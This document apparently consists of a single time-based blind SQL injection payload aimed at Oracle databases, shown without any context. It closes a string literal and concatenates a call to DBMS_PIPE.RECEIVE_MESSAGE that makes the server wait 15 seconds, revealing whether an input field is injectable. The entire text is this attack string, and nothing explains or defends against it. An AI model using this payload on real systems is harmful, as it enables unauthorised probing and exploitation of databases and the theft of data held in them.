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555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'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